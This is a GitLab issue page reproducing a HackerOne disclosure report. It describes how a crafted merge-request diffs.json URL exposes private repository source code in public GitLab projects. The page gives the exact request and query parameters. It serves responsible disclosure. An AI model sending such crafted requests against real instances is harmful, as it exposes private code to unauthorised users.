Source Code Disclosure of Private Repo in Public/Internal Project (#54914) · Issues · GitLab.org / GitLab FOSS

Source Code Disclosure of Private Repo in Public/Internal Project

**[HackerOne report #455673](https://hackerone.com/reports/455673)** by ngalog on 2018-12-05: **Summary:** One of the very unique feature of Gitlab is that it allows you to adjust the permission of each separate part of your project. Consider this setting, a public project with a private repo. Like in this screenshot ![publicWithPrivateRepo.PNG](https://h1.sec.gitlab.net/a/455673/385604/publicWithPrivateRepo.PNG) Owner of project could be secretly developing something in the repo part and but want to keep the rest of the project public. However, there is a way to bypass this protection, and still allow non-project member to view the source code of repo. ## Steps To Reproduce (Quick): - Login and visit [here](https://gitlab.com/ashleyjohnson/personal-project-with-private-source-code) to confirm you can't see the repo -- project id is `9769102` - Visit one of the project you own and visit `https://gitlab.com/{project_name_space}/merge_requests/new/diffs.json`, if you can see `{"html":"\u003cdiv class=\"nothing-here-block\"\u003e\nThis merge request cannot be created.\n\u003c/div\u003e\n"}` in response, please proceed, if not, please create at least one file in that project - Then add this in the query part of the url `?utf8=%E2%9C%93&merge_request%5Bsource_project_id%5D=9769102&merge_request%5Bsource_branch%5D=master&merge_request%5Btarget_project_id%5D=124124124&merge_request%5Btarget_branch%5D=master` - Now you are looking at the source code for my private repo in project `9769102` ## Slow way to reproduce: - Create a project with config like this ![publicWithPrivateRepo.PNG](https://h1.sec.gitlab.net/a/455673/385604/publicWithPrivateRepo.PNG) - create some file inside - login as other user, and visit `https://gitlab.com/{project_namespace_that_you_own}/merge_requests/new/diffs.json?utf8=%E2%9C%93&merge_request[source_project_id]={victim_project_id}&merge_request[source_branch]=master&merge_request[target_project_id]=1294819248&merge_request[target_branch]=master` - Source code disclosure! ## Impact source code disclosure for private repo in public project ## Attachments **Warning:** Attachments received through HackerOne, please exercise caution! * [publicWithPrivateRepo.PNG](https://h1.sec.gitlab.net/a/455673/385604/publicWithPrivateRepo.PNG)

issue